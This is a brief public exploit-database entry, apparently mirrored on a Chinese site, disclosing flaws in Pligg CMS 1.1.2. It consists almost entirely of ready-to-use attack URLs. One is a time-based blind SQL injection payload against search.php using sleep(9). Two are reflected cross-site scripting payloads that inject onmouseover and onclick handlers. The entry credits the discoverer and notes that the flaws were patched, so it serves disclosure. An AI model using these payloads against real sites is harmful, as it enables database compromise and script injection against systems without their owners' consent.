Pligg CMS 1.1.2 – Blind SQL Injection / Cross-Site Scripting

• Exploit Database
• 112 阅读

• 作者： Michael Brooks
  日期： 2010-12-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15824/
• 1 2 3 4 5 6 7 8 9 10 11 12 13

  Credit: Michael Brooks   Special thanks to Eric Heikkinen for patching these quickly.   Blind SQL Injection http://host/pligg_1.1.2/search.php?adv=1&status= 'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search +&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0   XSS: http://host/pligg_1.1.2/?xss='onmouseover=alert(1);// http://host/pligg_1.1.2/?search=" onclick=alert(1) a=